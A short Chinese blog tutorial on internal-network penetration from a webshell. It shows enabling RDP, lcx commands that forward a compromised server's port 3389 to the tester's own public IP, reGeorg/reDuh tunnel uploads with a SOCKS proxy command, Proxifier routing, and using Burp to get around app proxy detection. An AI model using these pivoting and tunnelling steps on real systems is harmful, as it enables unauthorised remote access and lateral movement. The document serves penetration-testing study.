浅析内网渗透

关于内网渗透其实方法和思路以及要注意的点内容非常多，又是一个大坑，我就暂且先从三个情况下分别整理一种方法，大概了解一下，先挖个坑哈，手里还有资料但太乱了，之后我再整理吧（真的很多，不是我偷懒，看的眼都晕了，感觉就是一套全新的渗透测试那么多）

前瞻

先回看一下之前的几个小思路吧

Webshell如何开启3389服务

1、通过修改注册表开启远程终端，详情请看： http://blog.sina.com.cn/s/blog_4b92e0c80100gx3x.html
2、通过3389工具开启远程终端
3、数据库可以开
4、上传exe可以开

服务器端口被修改如何查找

注册表读取、
端口扫描、
命令探针查找修改后的端口

外到内渗透连接

拿到webshell，服务器处于内网（没有公网地址）的情况下如何远程连接

1、通过lcx工具解决内网远程连接

把lcx传到远程服务器去
原理就是把目标机端口转发到自己公网IP的端口
Webshell上执行：lcx.exe -slave 自己的公网ip 2222 127.0.0.1 3389
将本机3389端口流量转发到公网ip的2222端口上去
自己的电脑里面执行：lcx.exe -listen 2222 4444
监听本地的2222端口将流量转发到4444
然后连接127.0.0.1 4444

缺陷

可能在公司里实际渗透测试过程中，你是在内网中的，同时你无法操控路由器，没有公网地址
解决就通过下面讲的服务器处于内网远程连接

内到内渗透连接

两台电脑分别在各自的内网怎么连接

通过端口转发脚本解决内网远程连接
通过reDUH
选择对应语言的文件上传
访问一下
通过设置，将本地3389映射到1234上
访问127.0.0.1 1234

内网渗透测试

在上面我们讲到的都是单端口转发，那么如何扩大战果，得到与目标机同一公网下的其他主机的权限呢

环境准备

两台虚拟机
两个网卡
一个处于lan区段1
另一个nat模式映射到公网

方法：需要两个工具结合

reGeorg

把tunnel.php传到服务器
本地执行cmd

reGeorg-master\reGeorgSocksProxy.py -p  9999 -u http://192.168.0.102:8080/tunnel.nosocket.php

让内网之间构成一个通道

Proxifier

代理工具装在本机
设置地址127.0.0.1端口跟上面对应
协议选择

socks协议
各种协议都支持
https协议
web

配置代理规则

本地所有数据包都走socks
通过它转发本地所有流量

补充

关于burp+Proxifier结合抓包

有很多APP现在是防代理的或者黑名单防御，比如微信
但是抓包中间加一个环节使用这个软件 就可以应对了
因为socks是很正规的

方法
在电脑上装模拟器
把burp ca证书丢在模拟器里加载
设置规则 新建规则 让模拟器这个进程所有数据包走socks就可以了
注意 结合使用的工具不要进行拦截 要选择direct模式
访问验证